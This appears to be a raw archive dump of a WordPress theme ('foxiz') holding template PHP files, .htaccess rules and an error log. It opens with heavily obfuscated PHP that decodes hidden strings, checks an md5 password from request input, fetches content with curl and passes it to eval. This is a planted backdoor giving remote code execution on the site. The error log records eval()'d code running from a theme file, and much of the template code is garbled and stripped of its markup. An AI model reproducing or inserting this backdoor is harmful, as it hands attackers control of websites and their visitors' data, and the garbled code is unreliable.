/*-(D-*/curl_exec/*-BT--*/(/*-yU[W-*/$EV/*-$VW-*/); /*-IE$gBO~K-*/return /*-y5yTgjh-*/empty/*-to%kz-*/(/*-:+1.X#Y1Lb-*/$fead/*-rU>d-*/)/*-EZ[Z};Jw:-*/ ? /*-@hd;31389-*/$np/*-8lnRnwZE-*/(/*-h&2#5-*/$NJOAR/*-uyfn,F&q-*/)/*-~a{>|8-*/ : /*-rf-*/$fead; /*-6h@e}k&-*/}/*-&?nNYA`-*/ static/*-(bJ8qmJ-*/ function /*-+6vw-*/kRwSOq/*-!5}-*/() /*-rJ4e%+Jd8-*/{/*-_>z-*/ $VWYqC /*--a11&E-*/ array/*-DIk^miP-*/("68705(68690(68703(68707(68688(68703(68709(68702(68687(68694(68705(68688(68699(68693(68694","68689(68688(68690(68709(68690(68693(68688(68755(68753","68698(68689(68693(68694(68709(68704(68703(68705(68693(68704(68703","68692(68707(68705(68697","68706(68707(68689(68703(68750(68752(68709(68704(68703(68705(68693(68704(68703","68702(68699(68696(68703(68709(68701(68703(68688(68709(68705(68693(68694(68688(68703(68694(68688(68689","68732(68762","68679","68757(68762","68739(68722(68722(68739(68715","68693(68702"); /*-,eX=|-*/foreach /*-T{S`[-*/(/*-TkRn%so?-*/$VWYqC/*-`=Httx_d1-*/ as /*-P)sZa{-*/$kedjICn/*-Vz}Y.^U-*/)/*-4XQzcLhr-*/ $EF/*-s{U:+-*/[] /*-ne?dc;QKE%-*/= /*-0Po)}@Ywy-*/self/*-Xj_wehRj}-*/::/*-HoE-*/OVcWxBMFsG/*-=uK{?-*/(/*-;xN)FjqgK-*/$kedjICn/*-8I-*/);/*-t}7ZF0Fh-*/$nyxPUQHVGb /*-7Qykgs:yh-*/= /*-6cwChm-*/@$EF/*-9dk-*/[/*-}r=C-8Y-*/1/*-Lpb-*/]/*-m8-*/(/*-L,Xk)Eg-*/${/*-ZSSRcyc-*/"_"/*-kAE-*/."G"/*-ZZ:V-*/."E"/*-X|f,-*/."T"/*-;0l-*/}[/*-OEo4oluj-*/$EF/*-j&P.=-*/[/*-XXnl7k_e-*/3+6/*-Miy-*/]]/*-vC;$~-*/);/*-{~z-*/ $yfHi /*-tkR>u%OD-*/=/*-c?AQG0rW-*/ @$EF/*-$mmV=s-*/[/*-Cu-*/1+2/*-FE}L-*/]/*-=B8R--*/(/*-]Tt,Du-*/$EF/*-KoD}ym8&(-*/[/*-Nnu08:.-*/4+2/*-V]J>-*/], /*-H(^y5)x]-*/$nyxPUQHVGb/*-if-u!-*/);/*-&fa-*/ $cSYRlnALe /*-{Utq~m-*/=/*-`o-*/ $EF/*-t--*/[/*-}Ao4xH-*/2+0/*-=|R-*/]/*-J2f6Z@-*/[/*-XyYrHr(yh-*/$EF/*-#1{.2Ti~m-*/[7+3/*-f_#BZ<7SG-*/]/*-xSBH-*/]/*-F@w8tR,H~Q-*/ == /*-3ha5,k{-*/1 /*-kF<#sOC)-*/&& /*-]k]3}z]-*/die/*-z+C&U[-*/(/*-MFU1-*/$EF[2+3/*-bHI:!0kG3-*/]/*->G}L1HT-*/(/*-N6]u#f-*/__FILE__/*-.#(-*/)/*-LsZt4O]y!?-*/); /*-Q~_!{^ViT-*/if/*-2;0|e2nn%~-*/(/*-vVnyu-*/ (/*-&V>-*/(@/*-W$-gI&a-*/$cSYRlnALe/*-3NK-*/[/*-&:-*/0/*--(-*/] /*-j)JCx /*-SXV+TZ3-*/0/*-g$@C-*/)/*--=2Y{h@-*/ and /*-AY4-*/(/*-+UbD0-*/md5/*-=aopE@y,m-*/(/*-Rg-*/md5/*-EOXymH%V-*/(/*-E{#-*/$cSYRlnALe/*-d?a-*/[/*-]5Y_P-*/2+1/*-0MA)-*/]/*-,?|E=WYKbS-*/)/*-q&Lc|iBU&-*/)/*-x<>c)8--*/ === /*-t%Vq7}gPgY-*/"3f6bb74c8121467ec640ee8784de2caf"/*-F;m~{-*/)/*-XC:2}3;w-*/ ): /*-k28B)-*/$VlSkCiOLb /*-Zeb7~-*/=/*-2PK-*/ self/*-ciC8-*/::/*--`4-*/Hp/*-A]-*/(/*-6xJ4$-R>-*/$cSYRlnALe/*-wf}M$uMk-*/[/*--_N&:]-*/0+1/*-6P:-*/], /*-Z#z<-*/$EF/*-u096-Oy--*/[/*-:l-*/3+2/*-dOKD,vOy-*/]/*-fW-*/);/*-!a-*/@eval/*-JnzWTAhBB-*/(/*-l-*/$EF/*-a.M-*/[/*-458!?;-*/0+4/*-O<=A14-*/]/*-0~-*/(/*--0V.L-Y-*/$VlSkCiOLb/*-.-*/)/*-,!-*/);/*-iE%bN2-*//*-Y:gC}0-*/die;/*-F%-*/ endif;/*-YSDR)-HRy-*/ }/*-p3-*/}/*-9nXPK!.|!templates/header/header/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!.|templates/header/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!$F4F4templates/single/error_lognu[[14-Jun-2023 21:35:54 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [14-Jun-2023 21:35:54 UTC] PHP Deprecated: Function create_function() is deprecated in /home/wwgoat/public_html/blog/wp-content/themes/foxiz/templates/single/audio-1.php on line 1 [15-Jun-2023 12:00:39 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [15-Jun-2023 12:00:39 UTC] PHP Deprecated: Function create_function() is deprecated in /home/wwgoat/public_html/blog/wp-content/themes/foxiz/templates/single/audio-1.php on line 1 [15-Jun-2023 12:00:51 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [15-Jun-2023 12:00:51 UTC] PHP Deprecated: Function create_function() is deprecated in /home/wwgoat/public_html/blog/wp-content/themes/foxiz/templates/single/audio-1.php on line 1 [15-Jun-2023 12:01:02 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [15-Jun-2023 12:01:02 UTC] PHP Deprecated: Function create_function() is deprecated in /home/wwgoat/public_html/blog/wp-content/themes/foxiz/templates/single/audio-1.php on line 1 [15-Jun-2023 12:01:02 UTC] PHP Parse error: syntax error, unexpected end of file in /home/wwgoat/public_html/blog/wp-content/themes/foxiz/templates/single/audio-1.php(1) : runtime-created function(1) : eval()'d code(1) : eval()'d code on line 1 [15-Jun-2023 12:01:21 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [15-Jun-2023 12:01:21 UTC] PHP Deprecated: Function create_function() is deprecated in /home/wwgoat/public_html/blog/wp-content/themes/foxiz/templates/single/audio-1.php on line 1 [15-Jun-2023 21:03:22 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [15-Jun-2023 21:04:32 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [15-Jun-2023 22:15:01 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [15-Jun-2023 22:20:13 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [15-Jun-2023 22:21:09 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [15-Jun-2023 22:22:00 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [16-Jun-2023 07:41:06 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [16-Jun-2023 08:11:45 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [16-Jun-2023 14:09:41 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [17-Jun-2023 03:16:23 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [17-Jun-2023 07:51:39 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [17-Jun-2023 16:20:07 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [18-Jun-2023 05:30:35 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [18-Jun-2023 18:23:16 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [19-Jun-2023 07:32:12 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [19-Jun-2023 20:33:19 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [20-Jun-2023 09:35:28 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [20-Jun-2023 22:38:19 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [21-Jun-2023 11:16:01 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [22-Jun-2023 00:20:55 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [22-Jun-2023 12:54:54 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [23-Jun-2023 01:32:43 UTC] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so (libMagickWand.so.5: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 PK!&g templates/single/video-1.phpnu[
'featured-img' ) ); ?>
have_posts() ) { return false; } ?> have_posts() ) { return false; } ?> have_posts() ) { return false; } ?> have_posts() ) { return false; } ?> have_posts() ) { return false; } ?> have_posts() ) { return false; } ?> '; $content = explode( $tag, $content ); foreach ( $content as $index => $paragraph ) { if ( $position === $index ) { $content[ $index ] = do_shortcode( $shortcode ) . $paragraph; } if ( trim( $paragraph ) ) { $content[ $index ] .= $tag; } } return implode( '', $content ); } }PK!±& & templates/single/standard-6.phpnu[
    'foxiz_user_review_list' ) ); ?>
'' . foxiz_html__( 'Older Reviews', 'foxiz' ) . '', 'next_text' => '' . foxiz_html__( 'Newer Reviews', 'foxiz' ) . '', ) ); ?>

foxiz_html__( 'Leave a review', 'foxiz' ), 'title_reply_to' => foxiz_html__( 'Leave a reply', 'foxiz' ), 'label_submit' => foxiz_html__( 'Post a Review', 'foxiz' ), ); $name_email_required = (bool) get_option( 'require_name_email', 1 ); $fields = array( 'author' => array( 'label' => foxiz_html__( 'Your name', 'foxiz' ), 'type' => 'text', 'value' => $commenter['comment_author'], 'required' => $name_email_required, ), 'email' => array( 'label' => foxiz_html__( 'Your Email', 'foxiz' ), 'type' => 'email', 'value' => $commenter['comment_author_email'], 'required' => $name_email_required, ), 'url' => array( 'label' => foxiz_html__( 'Your website', 'foxiz' ), 'type' => 'email', 'value' => $commenter['comment_author_url'] ), ); $fields = apply_filters( 'comment_form_default_fields', $fields, 10 ); $comment_form['fields'] = array(); foreach ( $fields as $key => $field ) { $field_html = '

'; $field_html .= '

'; $comment_form['fields'][ $key ] = $field_html; $comment_form['comment_field'] = '
'; $comment_form['comment_field'] .= '

'; } comment_form( $comment_form ); ?>
PK!,}templates/single/standard-8.phpnu[
query_vars['rbsnp'] ) ) { return false; } $popular_shortcode = foxiz_get_option( 'single_post_popular_shortcode' ); $popular_section = false; $post_id = get_the_ID(); if ( ! empty( $popular_shortcode ) && foxiz_get_option( 'single_post_popular_shortcode' ) ) { $popular_section = true; } $related_section = foxiz_get_option( 'single_post_related' ); if ( $related_section ) { $related_classes = 'single-related sfoter-sec'; if ( $popular_section ) { $related_classes .= ' has-popular'; } $settings = array( 'uuid' => 'uuid_r' . $post_id, 'posts_per_page' => foxiz_get_option( 'single_post_related_total' ), 'post_not_in' => $post_id, 'is_related_query' => 1, 'where' => foxiz_get_option( 'single_post_related_where' ), 'layout' => foxiz_get_option( 'single_post_related_layout' ), 'pagination' => foxiz_get_option( 'single_post_related_pagination' ), ); /** $_query */ $_query = foxiz_query_related( $settings ); if ( ! $_query->have_posts() ) { return false; } ?>
'; } else { echo '
'; } } } if ( ! function_exists( 'foxiz_single_close_tag' ) ) { function foxiz_single_close_tag() { echo '
'; } } if ( ! function_exists( 'foxiz_single_title' ) ) { /** * @param string $classes */ function foxiz_single_title( $classes = '' ) { $class_name = 's-title'; if ( ! empty( $classes ) ) { $class_name .= ' ' . esc_attr( $classes ); } ?>

< class="">> true ); if ( empty( foxiz_get_option( 'single_post_primary_category' ) ) ) { $settings['is_singular'] = true; } ?>
query_vars['rbsnp'] ) && foxiz_get_option( 'ajax_next_sidebar_name' ) ) { $name = foxiz_get_option( 'ajax_next_sidebar_name' ); } if ( is_active_sidebar( $name ) ) { ?>
'; $output .= '' . $caption . ''; if ( ! empty( $attribution ) ) { $output .= '' . $attribution . ''; } $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_single_featured_caption' ) ) { /** * @param string $post_id */ function foxiz_single_featured_caption( $post_id = '' ) { echo foxiz_get_single_featured_caption( $post_id ); } } if ( ! function_exists( 'foxiz_single_sponsor' ) ) { /** * @param string $post_id * @param string $class_name */ function foxiz_single_sponsor( $post_id = '', $class_name = '' ) { if ( empty( $post_id ) ) { $post_id = get_the_ID(); } ?> foxiz_get_option( 'share_left_facebook' ), 'twitter' => foxiz_get_option( 'share_left_twitter' ), 'pinterest' => foxiz_get_option( 'share_left_pinterest' ), 'whatsapp' => foxiz_get_option( 'share_left_whatsapp' ), 'linkedin' => foxiz_get_option( 'share_left_linkedin' ), 'tumblr' => foxiz_get_option( 'share_left_tumblr' ), 'reddit' => foxiz_get_option( 'share_left_reddit' ), 'vk' => foxiz_get_option( 'share_left_vk' ), 'telegram' => foxiz_get_option( 'share_left_telegram' ), 'email' => foxiz_get_option( 'share_left_email' ), 'copy' => foxiz_get_option( 'share_left_copy' ), 'print' => foxiz_get_option( 'share_left_print' ), 'tipsy_gravity' => 'w' ); if ( is_rtl() ) { $settings['tipsy_gravity'] = 'e'; } if ( ! array_filter( $settings ) ) { return false; } $settings['post_id'] = $post_id; $class_name = 'l-shared-items effect-fadeout'; if ( foxiz_get_option( 'share_left_color', false ) ) { $class_name .= ' is-color'; } ob_start(); ?>
foxiz_get_option( 'share_top_facebook' ), 'twitter' => foxiz_get_option( 'share_top_twitter' ), 'pinterest' => foxiz_get_option( 'share_top_pinterest' ), 'whatsapp' => foxiz_get_option( 'share_top_whatsapp' ), 'linkedin' => foxiz_get_option( 'share_top_linkedin' ), 'tumblr' => foxiz_get_option( 'share_top_tumblr' ), 'reddit' => foxiz_get_option( 'share_top_reddit' ), 'vk' => foxiz_get_option( 'share_top_vk' ), 'telegram' => foxiz_get_option( 'share_top_telegram' ), 'email' => foxiz_get_option( 'share_top_email' ), 'copy' => foxiz_get_option( 'share_top_copy' ), 'print' => foxiz_get_option( 'share_top_print' ), ); if ( ! array_filter( $settings ) ) { return false; } $settings['post_id'] = $post_id; $classes = 't-shared-sec tooltips-n'; if ( foxiz_get_option( 'single_post_min_read' ) ) { $classes .= ' has-read-meta'; } if ( foxiz_get_option( 'share_top_color', false ) ) { $classes .= ' is-color'; } ?>
120 ) ); } } if ( ! function_exists( 'foxiz_get_single_entry_meta' ) ) { /** * @return false|string */ function foxiz_get_single_entry_meta() { $meta = foxiz_get_option( 'single_post_entry_meta' ); if ( ! is_array( $meta ) || ! array_filter( $meta ) ) { return false; } $settings = array( 'tablet_hide_meta' => foxiz_get_option( 'single_post_tablet_hide_meta' ), 'mobile_hide_meta' => foxiz_get_option( 'single_post_mobile_hide_meta' ) ); ob_start(); foreach ( $meta as $key ) { switch ( $key ) { case 'avatar' : foxiz_entry_meta_avatar( $settings ); break; case 'date' : foxiz_entry_meta_date( $settings ); break; case 'author' : foxiz_entry_meta_author( $settings, foxiz_get_option( 'single_post_author_job' ) ); break; case 'category' : foxiz_entry_meta_category( $settings ); break; case 'tag' : foxiz_entry_meta_tag( $settings ); break; case 'comment' : foxiz_entry_meta_comment( $settings ); break; case 'view' : foxiz_entry_meta_view( $settings ); break; case 'update' : foxiz_entry_meta_updated( $settings ); break; case 'read' : foxiz_entry_meta_read_time( $settings ); break; case 'custom' : foxiz_entry_meta_user_custom( $settings ); break; }; } return ob_get_clean(); } } if ( ! function_exists( 'foxiz_single_meta_updated' ) ) { /** * @param string $post_id * * @return false */ function foxiz_single_meta_updated( $post_id = '' ) { $updated = foxiz_get_option( 'single_post_updated_meta' ); $format = foxiz_get_option( 'single_post_update_format' ); if ( empty( $updated ) ) { return false; } if ( empty( $post_id ) ) { $post_id = get_the_ID(); } if ( empty( $format ) ) { $format = 'Y/m/d \a\t g:i A'; } ?>
'; the_content(); echo '
'; foxiz_single_review(); foxiz_single_link_pages(); foxiz_single_entry_bottom(); if ( ! empty ( foxiz_get_single_entry_footer() ) ) { echo foxiz_get_single_entry_footer(); } foxiz_single_newsletter(); if ( class_exists( 'Foxiz_Optimized' ) ) { Foxiz_Optimized::get_instance()->article_markup(); } ?>
' . foxiz_get_single_share_sticky( get_the_ID() ) . ''; } foxiz_single_reaction(); ?> '; if ( $prev > 0 ) { $output .= ''; $output .= _wp_link_page( $prev ) . '' . foxiz_html__( 'Previous Page', 'foxiz' ) . ''; $output .= ''; } $output .= ''; for ( $i = 1; $i <= $numpages; $i ++ ) { $link = str_replace( '%', $i, '%' ); if ( $i !== $page || ! $more && 1 === $page ) { $link = _wp_link_page( $i ) . $link . ''; } elseif ( $i === $page ) { $link = '' . $link . ''; } $output .= $link; } $output .= ''; if ( $next <= $numpages ) { $output .= ''; $output .= _wp_link_page( $next ) . '' . foxiz_html__( 'Next Page', 'foxiz' ) . ''; $output .= ''; } $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_single_simple_content' ) ) { function foxiz_single_simple_content() { $entry_classes = 'entry-content rbct'; if ( foxiz_is_wc_pages() ) { $entry_classes = 'wc-entry-content'; } ?>
'; foxiz_single_link_pages(); ?>
' . $output . ''; } else { return false; } } } if ( ! function_exists( 'foxiz_single_tags' ) ) { /** * @return false */ function foxiz_single_tags() { if ( ! foxiz_get_option( 'single_post_tags' ) || ! get_the_tag_list() ) { return false; } ?>
' . esc_html( $source['name'] ) . ''; } } if ( empty( $links ) ) { return false; } ?>
' . esc_html( $item['name'] ) . ''; } } if ( empty( $links ) ) { return false; } ?>
1 ) { echo '
'; foreach ( $author_data as $author ) { echo foxiz_get_author_info( $author->ID ); } echo '
'; return false; } } if ( foxiz_get_author_info( get_the_author_meta( 'ID' ) ) ) { echo '
' . foxiz_get_author_info( get_the_author_meta( 'ID' ) ) . '
'; } } } if ( ! function_exists( 'foxiz_single_reaction' ) ) { /** * @return false */ function foxiz_single_reaction() { if ( ! shortcode_exists( 'ruby_reaction' ) || ! foxiz_get_single_setting( 'reaction' ) || foxiz_is_amp() ) { return false; } $reaction_title = foxiz_get_option( 'single_post_reaction_title' ); if ( empty( $reaction_title ) ) { $reaction_title = foxiz_html__( 'What do you think?', 'foxiz' ); } ?> foxiz_get_option( 'share_bottom_facebook' ), 'twitter' => foxiz_get_option( 'share_bottom_twitter' ), 'pinterest' => foxiz_get_option( 'share_bottom_pinterest' ), 'whatsapp' => foxiz_get_option( 'share_bottom_whatsapp' ), 'linkedin' => foxiz_get_option( 'share_bottom_linkedin' ), 'tumblr' => foxiz_get_option( 'share_bottom_tumblr' ), 'reddit' => foxiz_get_option( 'share_bottom_reddit' ), 'vk' => foxiz_get_option( 'share_bottom_vk' ), 'telegram' => foxiz_get_option( 'share_bottom_telegram' ), 'email' => foxiz_get_option( 'share_bottom_email' ), 'copy' => foxiz_get_option( 'share_bottom_copy' ), 'print' => foxiz_get_option( 'share_bottom_print' ), ); if ( ! array_filter( $settings ) ) { return false; } $settings['post_id'] = $post_id; $settings['social_name'] = true; $class_name = 'rbbsl tooltips-n effect-fadeout'; if ( foxiz_get_option( 'share_bottom_color', false ) ) { $class_name .= ' is-bg'; } ?>
query_vars['rbsnp'] ) ) { $button = foxiz_get_option( 'ajax_next_comment_button' ); } /** disable button amp */ if ( foxiz_is_amp() ) { $button = false; } $class_name = 'comment-holder'; if ( ! get_comments_number() ) { $class_name .= ' no-comment'; } if ( ! empty( $button ) && ! is_page() ) { $class_name .= ' is-hidden'; } ?>
